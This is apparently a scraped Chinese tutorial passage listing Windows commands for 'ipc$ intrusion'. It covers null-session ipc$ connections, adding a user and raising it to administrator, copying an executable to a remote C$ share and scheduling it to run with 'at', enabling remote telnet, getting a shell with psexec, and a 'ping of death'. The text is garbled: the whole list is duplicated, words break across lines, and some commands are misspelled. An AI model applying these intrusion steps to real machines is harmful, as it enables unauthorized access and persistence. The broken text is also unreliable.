net user (查看所有网络用户)
net user nike 123 /add(添加一个叫nike 的用户 密码为123)
net user nike (查看用户 nike 的状态)
net user nike 123456 /add (更改用户密码为123456)
net user nike /delete (删除nike 用户)
net localgroup administrator nike /add (把用户nike 的权限提升为管理员)
net password 密码 更改系统登陆密码
nslookup www.xxxx.com (查看网站的信息 比 ping 命令还要详细)
ping www.xxxx.com (查看网站的IP)
Ipconfig /all (查看本机IP的命令)
telnet 192.168.x.xx (远程登陆某主机的命令)
net user guest /active:yes 激活guest用户
net start 服务
名 开启
服务
;(如:net start telnet, net start schedule)
net stop 服务
名 停止某
服务
net time //目标ip 查看对方时间
net time //目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view [url=file://ip/]file://ip/[/url] 查看对方局域网内开启了哪些共享
net config 显示系统 网络
设置
net logoff 断开连接的共享
net pause 服务
名 暂停某
服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的 网络
连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C:共享
net share ipc$ /del
关闭目标的ipc$共享 ;如果你要给它开共享
文件夹,你可以用:
net share xinxin=c:/
这样就把它的c盘开为共享 名为xinxin共享
文件夹了。(可是我发现很多人错误的认为开共享
文件夹的命令
是net share c$,还大模大样的给菜鸟指指点点,真是误人子弟了)。再次声明,这些操作都是在shell下才能实现的。
十一 一些需要shell才能完成的命令
看到很多教程这方面写的十分不准确,一些需要shell才能完成命令 就简简单单的在ipc$连接下执行了,起了误导作用。那么下面我总结一下需要在shell才能完成的命令
:
1 向远程主机建立用户,激活用户,修改用户密码,加入管理组的操作需要在shell下完成;
2 打开远程主机的ipc$共享 ,默认共享
,普通共享
的操作需要在shell下完成;
3 运行/关闭远程主机的服务,需要在shell下完成;
4 启动/杀掉远程主机的进程,也需要在shell下完成(用软件的情况下除外,如pskill)。
十二 入侵中可能会用到的命令
为了这份教程的完整性,我列出了ipc$入侵中的一些常用命令 ,如果你已经掌握了这些命令
,你可以跳过这一部分看下面的内容。请注意这些命令
是适用于本地还是远程,如果只适用于本地,你只能在获得远程主机的shell(如cmd,telnet等)后,才能向远程主机执行。
1 建立/删除ipc$连接的命令
1)建立空连接:
net use //127.0.0.1/ipc$ "" /user:""
2)建立非空连接:
net use //127.0.0.1/ipc$ "密码" /user:"用户名"
3)删除连接:
net use //127.0.0.1/ipc$ /del
2 在ipc$连接中对远程主机的操作命令
1) 查看远程主机的共享 资源(看不到默认共享
):
net view //127.0.0.1
2) 查看远程主机的当前时间:
net time //127.0.0.1
3) 得到远程主机的netbios用户名列表:
nbtstat -A 127.0.0.1
4)映射/删除远程共享 :
net use z: //127.0.0.1/c
此命令 将共享
名为c的共享
资源映射为本地z盘
net use z: /del
删除映射的z盘,其他盘类推
5)向远程主机复制文件:
copy 路径/文件名 //IP/共享 目录名,如:
copy c:/xinxin.exe //127.0.0.1/c$ 即将c盘下的xinxin.exe复制到对方c盘内
当然,你也可以把远程主机上的文件复制到自己的机器里:
copy //127.0.0.1/c$/xinxin.exe c:/
6)远程添加计划任务:
at //IP 时间 程序名 如:
at //127.0.0.0 11:00 xinxin.exe
注意:时间尽量使用24小时制;如果你打算运行的程序在系统默认搜索路径(比如system32/)下则不用加路径,否则必须加全路径
3 本地命令
1)查看本地主机的共享 资源(可以看到本地的默认共享
)
net share
2)得到本地主机的用户列表
net user
3)显示本地某用户的帐户信息
net user 帐户名
4)显示本地主机当前启动的服务
net start
5)启动/关闭本地服务
net start 服务名
net stop 服务名
6)激活禁用的用户
net uesr 帐户名 /active:yes
很显然的是,虽然这些都是本地命令 ,但如果你在远程主机的shell中输入,比如你telnet成功后输入上面这些命令
,那么这些本地输入将作用在远程主机上。
4 其他一些命令
1)telnet
telnet IP 端口
telnet 127.0.0.0 23
2)用opentelnet.exe开启远程主机的telnet
OpenTelnet.exe //ip 管理员帐号 密码 NTLM的认证方式 port
OpenTelnet.exe //127.0.0.1 administrator "" 1 90
不过这个小工具需要满足四个要求:
1)目标开启了ipc$共享
2)你要拥有管理员密码和帐号
3)目标开启RemoteRegistry服务,用户就可以更改ntlm认证
4)对仅WIN2K/XP有效
3)用psexec.exe一步获得shell,需要ipc管道支持 psex
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的 网络
连接情况,常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由( 数据
包),参数:“-w数字”用于设置超时间隔。
ping ip(或 域名
) 向对方主机发送默认大小为32字节的
数据
,参数:“-l[空格]
数据
包大小”;“-n发送
数据
次数”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
net user nike 123 /add(添加一个叫nike 的用户 密码为123)
net user nike (查看用户 nike 的状态)
net user nike 123456 /add (更改用户密码为123456)
net user nike /delete (删除nike 用户)
net localgroup administrator nike /add (把用户nike 的权限提升为管理员)
net password 密码 更改系统登陆密码
nslookup www.xxxx.com
ping www.xxxx.com
Ipconfig /all (查看本机IP的命令)
telnet 192.168.x.xx (远程登陆某主机的命令)
net user guest /active:yes 激活guest用户
net start 服务
net stop 服务
net time //目标ip 查看对方时间
net time //目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view [url=file://ip/]file://ip/[/url] 查看对方局域网内开启了哪些共享
net config 显示系统 网络
net logoff 断开连接的共享
net pause 服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的 网络
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C:共享
net share ipc$ /del
关闭目标的ipc$共享
net share xinxin=c:/
这样就把它的c盘开为共享
十一 一些需要shell才能完成的命令
看到很多教程这方面写的十分不准确,一些需要shell才能完成命令
1 向远程主机建立用户,激活用户,修改用户密码,加入管理组的操作需要在shell下完成;
2 打开远程主机的ipc$共享
3 运行/关闭远程主机的服务,需要在shell下完成;
4 启动/杀掉远程主机的进程,也需要在shell下完成(用软件的情况下除外,如pskill)。
十二 入侵中可能会用到的命令
为了这份教程的完整性,我列出了ipc$入侵中的一些常用命令
1 建立/删除ipc$连接的命令
1)建立空连接:
net use //127.0.0.1/ipc$ "" /user:""
2)建立非空连接:
net use //127.0.0.1/ipc$ "密码" /user:"用户名"
3)删除连接:
net use //127.0.0.1/ipc$ /del
2 在ipc$连接中对远程主机的操作命令
1) 查看远程主机的共享
net view //127.0.0.1
2) 查看远程主机的当前时间:
net time //127.0.0.1
3) 得到远程主机的netbios用户名列表:
nbtstat -A 127.0.0.1
4)映射/删除远程共享
net use z: //127.0.0.1/c
此命令
net use z: /del
删除映射的z盘,其他盘类推
5)向远程主机复制文件:
copy 路径/文件名 //IP/共享
copy c:/xinxin.exe //127.0.0.1/c$ 即将c盘下的xinxin.exe复制到对方c盘内
当然,你也可以把远程主机上的文件复制到自己的机器里:
copy //127.0.0.1/c$/xinxin.exe c:/
6)远程添加计划任务:
at //IP 时间 程序名 如:
at //127.0.0.0 11:00 xinxin.exe
注意:时间尽量使用24小时制;如果你打算运行的程序在系统默认搜索路径(比如system32/)下则不用加路径,否则必须加全路径
3 本地命令
1)查看本地主机的共享
net share
2)得到本地主机的用户列表
net user
3)显示本地某用户的帐户信息
net user 帐户名
4)显示本地主机当前启动的服务
net start
5)启动/关闭本地服务
net start 服务名
net stop 服务名
6)激活禁用的用户
net uesr 帐户名 /active:yes
很显然的是,虽然这些都是本地命令
4 其他一些命令
1)telnet
telnet IP 端口
telnet 127.0.0.0 23
2)用opentelnet.exe开启远程主机的telnet
OpenTelnet.exe //ip 管理员帐号 密码 NTLM的认证方式 port
OpenTelnet.exe //127.0.0.1 administrator "" 1 90
不过这个小工具需要满足四个要求:
1)目标开启了ipc$共享
2)你要拥有管理员密码和帐号
3)目标开启RemoteRegistry服务,用户就可以更改ntlm认证
4)对仅WIN2K/XP有效
3)用psexec.exe一步获得shell,需要ipc管道支持 psex
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的 网络
netstat -v 查看正在进行的工作
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由( 数据
ping ip(或 域名
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件